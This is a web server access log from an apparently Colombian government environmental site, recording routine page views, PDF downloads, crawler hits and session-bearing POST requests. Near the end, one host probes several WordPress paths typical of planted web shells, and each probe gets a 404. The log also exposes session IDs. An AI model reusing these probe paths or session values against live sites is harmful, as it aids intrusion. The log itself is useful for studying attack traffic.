172.22.2.4 - - [31/Aug/2023:00:26:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58981
201.245.192.253 - - [31/Aug/2023:00:28:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43480
201.245.192.253 - - [31/Aug/2023:00:28:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43193
201.245.192.253 - - [31/Aug/2023:00:29:14 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:29:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:29:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [31/Aug/2023:00:31:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:31:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:32:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
66.249.66.193 - - [31/Aug/2023:00:34:07 -0500] "GET /secretaria-de-ambiente-unidos-por-un-nuevo-aire.html HTTP/1.1" 304 -
201.245.192.253 - - [31/Aug/2023:00:34:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:00:35:55 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [31/Aug/2023:00:36:13 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0809&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1101
186.28.20.84 - - [31/Aug/2023:00:36:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0809.pdf HTTP/1.1" 200 597205
216.245.221.92 - - [31/Aug/2023:00:36:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:00:38:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43480
201.245.192.253 - - [31/Aug/2023:00:38:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43193
172.22.2.4 - - [31/Aug/2023:00:38:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0146&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1104
186.28.20.84 - - [31/Aug/2023:00:38:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0146.pdf HTTP/1.1" 200 458995
172.22.2.4 - - [31/Aug/2023:00:37:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:00:39:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:00:38:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45101
66.249.66.193 - - [31/Aug/2023:00:40:07 -0500] "GET /aeropuerto-el-dorado-distrito-sensibilizo-a-viajeros-para-evitar-el-trafico-de-especies-silvestres.html HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2023:00:40:24 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1097&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [31/Aug/2023:00:40:36 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1097&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [31/Aug/2023:00:40:40 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1097&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [31/Aug/2023:00:40:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1097&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1070
172.22.2.4 - - [31/Aug/2023:00:40:49 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1097&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [31/Aug/2023:00:41:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:41:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4658&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1104
201.245.192.253 - - [31/Aug/2023:00:41:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [31/Aug/2023:00:41:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:43:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1169&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1102
186.28.20.84 - - [31/Aug/2023:00:43:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1169.pdf HTTP/1.1" 200 551038
201.245.192.253 - - [31/Aug/2023:00:43:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.59.2.130 - - [31/Aug/2023:00:43:19 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Parque-entrenubes.mp4 HTTP/1.1" 206 458752
201.245.192.253 - - [31/Aug/2023:00:43:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:43:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4658&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1104
152.61.192.232 - - [31/Aug/2023:00:44:15 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [31/Aug/2023:00:44:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [31/Aug/2023:00:44:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
52.167.144.185 - - [31/Aug/2023:00:44:28 -0500] "GET /BLA/resoluciones/AUTOS%202011/4961.pdf HTTP/1.1" 200 474839
201.245.192.253 - - [31/Aug/2023:00:44:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:00:43:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:45:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0812&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1102
186.28.20.84 - - [31/Aug/2023:00:45:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0812.pdf HTTP/1.1" 200 524141
201.245.192.253 - - [31/Aug/2023:00:45:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:44:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54960
201.245.192.253 - - [31/Aug/2023:00:45:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:45:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0177&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 1107
186.28.20.84 - - [31/Aug/2023:00:46:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0177.pdf HTTP/1.1" 200 487857
66.249.66.192 - - [31/Aug/2023:00:46:22 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 200 903
172.22.2.4 - - [31/Aug/2023:00:46:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0472&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1362
216.245.221.92 - - [31/Aug/2023:00:46:49 -0500] "HEAD / HTTP/1.1" 200 -
186.28.20.84 - - [31/Aug/2023:00:46:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0472.pdf HTTP/1.1" 200 570290
201.245.192.253 - - [31/Aug/2023:00:49:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:00:49:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0826&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1104
186.28.20.84 - - [31/Aug/2023:00:49:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0826.pdf HTTP/1.1" 200 624196
172.22.2.4 - - [31/Aug/2023:00:50:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0423&usuario=&sector=&fecha=2023&resuelve= HTTP/1.1" 200 1104
186.28.20.84 - - [31/Aug/2023:00:50:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0423.pdf HTTP/1.1" 200 480618
172.22.2.4 - - [31/Aug/2023:00:49:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:00:49:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [31/Aug/2023:00:51:49 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.238 - - [31/Aug/2023:00:52:04 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%206%20del%208%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2023:00:52:36 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1518&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1100
186.28.20.84 - - [31/Aug/2023:00:52:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1518.pdf HTTP/1.1" 200 749400
201.245.192.253 - - [31/Aug/2023:00:53:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:53:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:54:00 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [31/Aug/2023:00:54:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1079&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1104
186.28.20.84 - - [31/Aug/2023:00:54:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1079.pdf HTTP/1.1" 200 695620
172.22.2.4 - - [31/Aug/2023:00:54:14 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [31/Aug/2023:00:54:14 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [31/Aug/2023:00:54:14 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [31/Aug/2023:00:54:14 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [31/Aug/2023:00:54:15 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [31/Aug/2023:00:54:19 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
201.245.192.253 - - [31/Aug/2023:00:54:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.208 - - [31/Aug/2023:00:55:15 -0500] "GET /Publicaciones/2023EE195878.pdf HTTP/1.1" 200 309541
172.22.2.4 - - [31/Aug/2023:00:54:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Aug/2023:00:56:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:00:56:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:00:57:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:00:55:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
201.245.192.253 - - [31/Aug/2023:00:59:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:01:01:26 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [31/Aug/2023:01:01:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:01:00:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:01:02:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:01:02:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:01:01:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53766
40.77.167.52 - - [31/Aug/2023:01:04:10 -0500] "GET /Publicaciones/2023EE197544.pdf HTTP/1.1" 200 981846
186.102.77.136 - - [31/Aug/2023:01:04:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19b+tOktBsoboGfTZiavZ6j+sir9e/DIJhsjbuKFSQmjBf1vMGeiA8y/9VVW6FYtzMedibCkKcTbBag/jfnNYbgMY5ynzTh1MhmM96E2HhQNbeTBaZhmT5l8NUOTAJn+VAIfChP5APo6+8NQTsmw2MUsJb49Z4bU4hIccJ1QHPbH7C701G80sc2v6wjGAEjSDaC+CpLpWWmRjnsfzpZ6mvIfL4Yb6AYSctUsAF2Rhj9BFtArQGiaWP09ieE0eNxv77TQ9auyi24sWkPULIRin9C1T/3Scvutwo=&u=U2FsdGVkX1+Q1BSI8LPxI7nRrj4KAvsV6Uuhb5B/gU/V3a54yDnqEEYVN1BiumOC&y=U2FsdGVkX18ffdDtOVX6XMghM1xoH2ltbvNAMgwHSHB8LwqEq+6e3iz3z9UgMhre HTTP/1.1" 200 26
186.102.77.136 - - [31/Aug/2023:01:04:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18dT+K0zBfhxD6Sc+37q3NHZQgFBsG/z9xpaeHFZRXtG87Buo6iZHd+DepSUObDA6tGKohEPN4hfvgDRcVepvdB/QswSX/NDPye+es0bXusQKXZ8wJZYnVt3pMx8cQEw9AsUsdVJpLi+zBVgivoMmTB5HTF/YfLAm6d9lzK+uvnnxlagmSeQh/UKgtiPlhgoiHbys/X+kTUHTjxlGatFbaNJdxSNmzxkEjqD1P8LuBBy3CElRMFkWdAFzzzBB1Prgjj54iHBJKhf0IUAr8jnNHRvvgI3srl3Qi05Wb7kp6JVQ77BDS5PfFFX81yV6wyGR4jTihPeCRUOdbmmBmdLL7CoTCb3qOT5DtmoKeh+FBVztQ1nQM6KqUW3wM/SdN08449P1DdjhPs6FcoMI2oWAr5FxIwns5MgstWoR9jawA3cd8hyDACD00RTtBV6VWdMxV+sGL51RYlXuySsrokMrLugWN4ZOrOtasW2NSFqPt/KXaJ4SZY+Q2Uiw5iS3ZH6mxnzR5nEtasg+7qX/pSCesz31JcQ+vMeFLlqZILPO+iwIDTD9n5NhZ+HJmyURqskBsNJ/fQb2d7WPuLk0F8kWR2jTZ2I/tfbaZVRH5r2sjQlbVK5CCpd8zObofe5oWzgEM0oEVaRDpR4arHu1WEa9oIqE/F9GMpug8Lrex/s2DI8vKW/KVVFll/zItDsZNpUqkafbun4BZsUMeF1bz5MB1CN/RKc0YbV1HBu0tGVtmDghddW1xC51ke5VIr6Z2FTLlp7hjN3bozSSkRp06vleIJ70VLYC4FK1In/JNGbLxlf8YOozJGgyxoFI5bRuSigDl9awHmeKKojkibWT+NvPRPAaHpPvCtVDSy5e3FojbPxBL/3T6ixI/qIFliJ3+4dY1Yn8VbLPWfn1Jo/p2TzR8QTjXibsWfx/N2g8/bRyLyWQnA7NwkO1tkGHBALKM/gs3lesvDnRbeK7cLynBggupumxrw+MIyTdcwGOq7qV/4KKko3WljapWzdj66l6vK/2gNm52lImePoIA25eLoI4McBCjmLvcKjLw4E70EN0AmBevKDQQLH0Qw&u=U2FsdGVkX1+Q1BSI8LPxI7nRrj4KAvsV6Uuhb5B/gU/V3a54yDnqEEYVN1BiumOC&y=U2FsdGVkX18ffdDtOVX6XMghM1xoH2ltbvNAMgwHSHB8LwqEq+6e3iz3z9UgMhre HTTP/1.1" 200 26
186.102.77.136 - - [31/Aug/2023:01:04:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18orfik+1DZGahGiVhbn9w5Jk8AoyFc8juee7QcsOwH55GryEaRmW1zSigxVvAMX85GpJiMp5rRXgANKRVKTH2atK/QnjVzV/e4aqSu0Dmvg/lG7vQ2KbXOh5VtV+igh8x0JRNcyXtNlvVZ6BsQ9lOdqEA4Notayic=&u=U2FsdGVkX1+Q1BSI8LPxI7nRrj4KAvsV6Uuhb5B/gU/V3a54yDnqEEYVN1BiumOC&y=U2FsdGVkX18ffdDtOVX6XMghM1xoH2ltbvNAMgwHSHB8LwqEq+6e3iz3z9UgMhre HTTP/1.1" 200 26
186.102.77.136 - - [31/Aug/2023:01:04:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+kPVurBYuMZMRuA+UjaPAtzQBfZwuRDXs5X/rkbHuhI0EyTHkrnMaxsWbQ9jxjACWzPycmMkr8MqSt/XFUGN7C5GkQy0Fot5/6ppcMBhRCPQXvpu3wuX74nDoIeuN1r6TybfXxH66J6komOJ2keD8B/xYXIe+k2Ck=&u=U2FsdGVkX1+Q1BSI8LPxI7nRrj4KAvsV6Uuhb5B/gU/V3a54yDnqEEYVN1BiumOC&y=U2FsdGVkX18ffdDtOVX6XMghM1xoH2ltbvNAMgwHSHB8LwqEq+6e3iz3z9UgMhre HTTP/1.1" 200 26
186.102.77.136 - - [31/Aug/2023:01:04:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+f9cbTkqhZ5XxWDNXNv4KUxVn/5eJg9Z0cLT72J4ruMslT2CosA7maZZHEAMoET1mFa2qoxWFVyFw6BEujP+Vt1eohbNhocXTKJUVF2X4971LVw7BwgaGJQCWDq2MxfCdXYeWQh168Xecgjmcum2i0MymXA1Yl5eM=&u=U2FsdGVkX1+Q1BSI8LPxI7nRrj4KAvsV6Uuhb5B/gU/V3a54yDnqEEYVN1BiumOC&y=U2FsdGVkX18ffdDtOVX6XMghM1xoH2ltbvNAMgwHSHB8LwqEq+6e3iz3z9UgMhre HTTP/1.1" 200 26
186.102.77.136 - - [31/Aug/2023:01:04:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19AWooUSsPY4WOi45hGe9M4BMK2lNSXpng/9A+YFLapznxRubyhKIopJ8L6DGxxSrr1Wv+H3xNBFOABPj7cIqY6b1On8Yqe1vLDh5IDLREUFVjZroS6DHm9yp2yGYMcTnj9scVj0VWDIdww9BozZawjVkiXrJ31VSsYw9PhLBhFRoBONDXlorzbDZd+VpMR0GkCJn28Lak2ZA==&u=U2FsdGVkX1+Q1BSI8LPxI7nRrj4KAvsV6Uuhb5B/gU/V3a54yDnqEEYVN1BiumOC&y=U2FsdGVkX18ffdDtOVX6XMghM1xoH2ltbvNAMgwHSHB8LwqEq+6e3iz3z9UgMhre HTTP/1.1" 200 26
201.245.192.253 - - [31/Aug/2023:01:04:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:01:04:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [31/Aug/2023:01:04:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [31/Aug/2023:01:06:49 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.52 - - [31/Aug/2023:01:06:51 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
69.63.189.8 - - [31/Aug/2023:01:07:09 -0500] "GET /images/avistamiento-aves.jpg HTTP/1.1" 200 104313
201.245.192.253 - - [31/Aug/2023:01:07:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:01:07:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:01:06:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:01:07:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52656
201.245.192.253 - - [31/Aug/2023:01:09:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.221 - - [31/Aug/2023:01:11:11 -0500] "GET /Publicaciones/2023EE198783.pdf HTTP/1.1" 200 232460
201.245.192.253 - - [31/Aug/2023:01:11:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:01:11:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [31/Aug/2023:01:11:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2023:01:12:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.196 - - [31/Aug/2023:01:14:36 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
201.245.192.253 - - [31/Aug/2023:01:14:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:01:13:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
201.245.192.253 - - [31/Aug/2023:01:15:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.182 - - [31/Aug/2023:01:15:51 -0500] "GET /Publicaciones/2023EE198087.pdf HTTP/1.1" 200 232055
201.245.192.253 - - [31/Aug/2023:01:16:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
152.61.128.50 - - [31/Aug/2023:01:16:37 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [31/Aug/2023:01:16:38 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [31/Aug/2023:01:16:39 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [31/Aug/2023:01:16:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:01:18:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:01:18:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [31/Aug/2023:01:18:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43168
201.245.192.253 - - [31/Aug/2023:01:18:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43196
144.217.180.167 - - [31/Aug/2023:01:18:38 -0500] "GET /wp-content/themes/arvana/400.php HTTP/1.1" 404 1022
144.217.180.167 - - [31/Aug/2023:01:18:38 -0500] "GET /wp-content/plugins/pref-lang/bert.php HTTP/1.1" 404 1022
144.217.180.167 - - [31/Aug/2023:01:18:39 -0500] "GET /wp-content/themes/witol/settings.php HTTP/1.1" 404 1022
144.217.180.167 - - [31/Aug/2023:01:18:39 -0500] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 1022
144.217.180.167 - - [31/Aug/2023:01:18:39 -0500] "GET /wp-content/plugins/core-plugin/cong.php HTTP/1.1" 404 1022
201.245.192.253 - - [31/Aug/2023:01:19:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [31/Aug/2023:01:18:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2023:01:20:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d67725d80cf2bc4e24af398de351d341f7.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.182 - - [31/Aug/2023:01:20:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2023%2F HTTP/1.1" 200 264124
201.245.192.253 - - [31/Aug/2023:01:20:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6b54e6090c9c84d6aaa2096afff42cd9b.e3iSbxaKaheRe34Rch0Ra3mLchv0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Aug/2023:01:19:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
40.77.167.208 - - [31/Aug/2023:01:21:37 -0500] "GET /BLA/resoluciones/AUTOS%202023/2613.pdf HTTP/1.1" 200 1081031
40.77.167.208 - - [31/Aug/2023:01:21:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/2520.pdf HTTP/1.1" 200 2620774
40.77.167.208 - - [31/Aug/2023:01:21:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/2766.pdf HTTP/1.1" 200 682364
40.77.167.208 - - [31/Aug/2023:01:21:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/1910.pdf HTTP/1.1" 200 407314
